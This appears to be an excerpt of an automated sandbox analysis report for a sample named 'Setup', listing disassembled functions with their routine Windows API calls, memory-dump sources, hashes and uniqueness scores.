                                                              • API String ID: 3682816334-0
                                                              • Opcode ID: 3863904471caebe19fff6b7cedf27eaa759a8d3e264883ed45a2a7ad737b0a00
                                                              • Instruction ID: 30d27adb416f5794277206989c3233a0fd9cff6e92c5b331aef87237c0214fbc
                                                              • Opcode Fuzzy Hash: 3863904471caebe19fff6b7cedf27eaa759a8d3e264883ed45a2a7ad737b0a00
                                                              • Instruction Fuzzy Hash: 17F01C3061014ADFDF10DFA4C808AED77BAFF51318F048815E4109BB50CB31D919CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C975514 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cb36d614b501c6515fe767235c8092c8fc69d4add58911ed134cce3341600c4
                                                              • Instruction ID: 9ade41c34975e45d8df6c0d45b8b5f3fb5dd036c6f35075b8a3a32229693da0c
                                                              • Opcode Fuzzy Hash: 8cb36d614b501c6515fe767235c8092c8fc69d4add58911ed134cce3341600c4
                                                              • Instruction Fuzzy Hash: F7E0E575204109FFCF519FA5C8088897FBAFF19359714C065F8198A520DB32CA50DFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C918129 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,6C91AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C918149
                                                                • Part of subcall function 6C9689C8: GetLastError.KERNEL32(6C9180E8,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9689C8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 300e3e0775471edc6f62a623451237c01c4f6a3208f04e4645a4814fcb032c2e
                                                              • Instruction ID: dfeccf349b82380b0fb28589ea51e964e0ddbdc42c6c15dbeddb6463a4d41fa4
                                                              • Opcode Fuzzy Hash: 300e3e0775471edc6f62a623451237c01c4f6a3208f04e4645a4814fcb032c2e
                                                              • Instruction Fuzzy Hash: ECE0927250010CBF8B08CF65C845C8E3BB8EF06364B104619F925D3680D770EA00EB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A7E56 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,00000006,?,?,?,?,6C48DAC1,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 6C4A7E76
                                                                • Part of subcall function 6C4A7F08: GetLastError.KERNEL32(6C4A7B0B,?,?,?,00000000), ref: 6C4A7F08
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 7d0b047a55276fe8da4f01f4bf7262a7d7ef563eae90816f2d7824450986e086
                                                              • Instruction ID: 1bf6ce28ad4e71c1a5bfcfd556005fd445d8dcf55b38ae0d2f7055746bad1258
                                                              • Opcode Fuzzy Hash: 7d0b047a55276fe8da4f01f4bf7262a7d7ef563eae90816f2d7824450986e086
                                                              • Instruction Fuzzy Hash: 27E09A72604208BF8B04CFA5CC40DCF3BB8EB0A324B104219F926D3694EB30EE10EB20
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48B93E Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48B945
                                                                • Part of subcall function 6C4A830D: _vwprintf.LIBCMT ref: 6C4A8353
                                                                • Part of subcall function 6C4A830D: _vswprintf_s.LIBCMT ref: 6C4A8378
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_vswprintf_s_vwprintf
                                                              • String ID:
                                                              • API String ID: 3682816334-0
                                                              • Opcode ID: a93b47b08eada28be0fa43c02e3d2e862a3cdc6d9a04897584a55f14bdf931db
                                                              • Instruction ID: 6838bf1e47c3150a7f4a237842382ee10216635e0a9e4c171deee404f2cc2d29
                                                              • Opcode Fuzzy Hash: a93b47b08eada28be0fa43c02e3d2e862a3cdc6d9a04897584a55f14bdf931db
                                                              • Instruction Fuzzy Hash: A2F0F87460014A9FDF00DFA4C849EEEB7B5FF40218F404429E514AB751DB309A1ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91395E Relevance: 1.5, APIs: 1, Instructions: 22COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913965
                                                                • Part of subcall function 6C948C24: __EH_prolog3.LIBCMT ref: 6C948C2B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: 6139af82972535381c8091f378ad465d9c79b0be38b3b9fb207be058d091dbf2
                                                              • Instruction ID: 1d3cc5f87d828e8a3a4894c66a619daa455a06aa1c18f090f6d948f209330221
                                                              • Opcode Fuzzy Hash: 6139af82972535381c8091f378ad465d9c79b0be38b3b9fb207be058d091dbf2
                                                              • Instruction Fuzzy Hash: F9F03971501106EFDB10DBB8C904A9DB762BF21318F108645E1109BB90CB31E928DBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49E104 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch
                                                              • String ID:
                                                              • API String ID: 3886170330-0
                                                              • Opcode ID: b23f1d0b50d06fb03d29e6360efd349533324bc80d9f1fca43f8a453dcf55435
                                                              • Instruction ID: 1947d6160baf9df0bd7eb9ecdc6703ba0c595a61b8735a71fd9ce74241be8643
                                                              • Opcode Fuzzy Hash: b23f1d0b50d06fb03d29e6360efd349533324bc80d9f1fca43f8a453dcf55435
                                                              • Instruction Fuzzy Hash: D3F0D474900605CFCB20DFB0C548F9EBBB1BF49315F204658D0566B7A0CB71AE48CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91391D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913924
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: f6a61c778a56c1fdfaa3db20e6963bbca3f4c29f287b4235902f9c0ea846c1a0
                                                              • Instruction ID: c2a6a4bf129405cad908ea6f13466c2e3c687fec9048cd469f6d9650c4aec895
                                                              • Opcode Fuzzy Hash: f6a61c778a56c1fdfaa3db20e6963bbca3f4c29f287b4235902f9c0ea846c1a0
                                                              • Instruction Fuzzy Hash: D4E01A36602205EFCB118F54C940B9DB7A1FF28314F00C405F9159BB50C730EA24DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9180F7 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,6C9460F1), ref: 6C91810D
                                                                • Part of subcall function 6C9689C8: GetLastError.KERNEL32(6C9180E8,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9689C8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 6a221b7b1ca188da2ac3d3fe460270ecb1cefd0766ffe70bb72e15b81158b8fa
                                                              • Instruction ID: 4a83af57d5acf7fa5e2812974464bf7d3b2796a2cc270fb50687e513f7aeaacf
                                                              • Opcode Fuzzy Hash: 6a221b7b1ca188da2ac3d3fe460270ecb1cefd0766ffe70bb72e15b81158b8fa
                                                              • Instruction Fuzzy Hash: 8AD0123224420CBBDB048EA2CC05E9A3B6DFB55754F004022F91485950D631D520D755
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C948380 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C9484FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794,00000000), ref: 6C94851E
                                                                • Part of subcall function 6C9484FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794), ref: 6C94853F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$H_prolog3
                                                              • String ID:
                                                              • API String ID: 692526729-0
                                                              • Opcode ID: 296e54984fe992877f882261c6c905503a4f80b622e80cbac9da73a9452801b7
                                                              • Instruction ID: 00b7661a164e7cdf6fcda08ceaa3733748d06dbe8a930ace7fd0c339b7873477
                                                              • Opcode Fuzzy Hash: 296e54984fe992877f882261c6c905503a4f80b622e80cbac9da73a9452801b7
                                                              • Instruction Fuzzy Hash: 72E0EC31101214A7DF166B548901BDE33166F3161CF04C001E940AFE40CB35CA2996BA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94833E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: ad26dbd37c085b286465aff67df41fe2ab1ba87a36349b2d4d04eb3b2e7257d3
                                                              • Instruction ID: 3e5d0ae67c29ff748bf5bd0e235d396e22018ac5933edc8484373a9949148d44
                                                              • Opcode Fuzzy Hash: ad26dbd37c085b286465aff67df41fe2ab1ba87a36349b2d4d04eb3b2e7257d3
                                                              • Instruction Fuzzy Hash: 17E0EC35102614A7EF166A658911BCE32156F3175CF04C001E9407FE50C735CA2997AA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95D713 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,6C9623E8,?,00000000,00000000), ref: 6C95D729
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: b0de8c4f23f97cd9882ec13483aba405871e13eaa88eea6fc594da08837b248c
                                                              • Instruction ID: 3ef6aea8de15e2e21509daa5c2eb33d096ba00c528ab634228af74fe64f7e76a
                                                              • Opcode Fuzzy Hash: b0de8c4f23f97cd9882ec13483aba405871e13eaa88eea6fc594da08837b248c
                                                              • Instruction Fuzzy Hash: AED0C9F28057603FA7349A712C48C632DADD995195355095AB851D7901C661CD44C2E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C49E4B7 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C49E4BE
                                                                • Part of subcall function 6C49E104: __EH_prolog3_catch.LIBCMT ref: 6C49E10B
                                                                • Part of subcall function 6C49E75F: __EH_prolog3.LIBCMT ref: 6C49E766
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_catch$H_prolog3
                                                              • String ID:
                                                              • API String ID: 3796446187-0
                                                              • Opcode ID: 8fec60ba670addfb13413f3f41dcd8162bebba3f96d2bd87ff135463b5f422f6
                                                              • Instruction ID: 140923a78943314bf1d051454b71e51174f5d65cdcd5e706305137c8e25a26e7
                                                              • Opcode Fuzzy Hash: 8fec60ba670addfb13413f3f41dcd8162bebba3f96d2bd87ff135463b5f422f6
                                                              • Instruction Fuzzy Hash: 3DD05E70840224A6CB14DBB48545FEEBB20BB40708F10840D900036B40CF388A1C87F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94BC49 Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000172,00000000,?), ref: 6C94BC5A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 6b0a1129d1aa6d4f027a284d2b092b3d9500d4c4aa203c9597ac4b720dabcfd8
                                                              • Instruction ID: 508cfd927b526e53281ab1b53384bb75867847c0bd5b8c8ae132026eac0f555a
                                                              • Opcode Fuzzy Hash: 6b0a1129d1aa6d4f027a284d2b092b3d9500d4c4aa203c9597ac4b720dabcfd8
                                                              • Instruction Fuzzy Hash: E9C012712402047BC7110E95DC05F817EA5D755750F104025F74886150C5719810D784
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48FF14 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6C48FF21
                                                                • Part of subcall function 6C49007B: SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 6C4900A9
                                                                • Part of subcall function 6C49007B: SetWindowPos.USER32(0000000C,?,00000000,00000000,00000000,00000000,00000003,?,?), ref: 6C4900E6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$ChildEnumWindows
                                                              • String ID:
                                                              • API String ID: 1604351572-0
                                                              • Opcode ID: d7ebcabd0a369c96c972212f4e63bc7f23157945e5ffb8c5847d5e8c99b5af23
                                                              • Instruction ID: 0c46e8c18ccab33fa23796db5c404158295c5794f4513e5613c1f13ee6132bd3
                                                              • Opcode Fuzzy Hash: d7ebcabd0a369c96c972212f4e63bc7f23157945e5ffb8c5847d5e8c99b5af23
                                                              • Instruction Fuzzy Hash: E9C08C3A0030B0766630BB346C08DDB2EAA9F872A0305000BF20091510CA10CC028AE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9754F2 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C975505
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 44ce89a9bdde6ffad1b98b9e586ddcd9fdc58862dd38d06de27d23b7e1e15dcf
                                                              • Instruction ID: 10d1f37c224ba3bcd48150aa1f34e6d2f016c7a870984d18a6656ae34e60af1b
                                                              • Opcode Fuzzy Hash: 44ce89a9bdde6ffad1b98b9e586ddcd9fdc58862dd38d06de27d23b7e1e15dcf
                                                              • Instruction Fuzzy Hash: 80C08031001108F7CB214E40DC05F957F69E741354F24C020B61C15460C773D561D6D4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9491AF Relevance: 1.5, APIs: 1, Instructions: 11comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,6C91B029,?,0000002C,6C95D55B,?,?,?,?,00000001), ref: 6C9491C5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID:
                                                              • API String ID: 542301482-0
                                                              • Opcode ID: 1e827eb7c476ffe770e2d8e3c4081247095a693a024e57192d8e6a7a9f9d3791
                                                              • Instruction ID: 63d80fd6537cb29e7ed46d404fb1386aada1b940305e2e30cc89069203535c2f
                                                              • Opcode Fuzzy Hash: 1e827eb7c476ffe770e2d8e3c4081247095a693a024e57192d8e6a7a9f9d3791
                                                              • Instruction Fuzzy Hash: 40C02B7638020CBBC7200581DC05FA9BE28D7D8754F014012B328144828DB1D820D5E9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9754D6 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                              Download Yara Rule
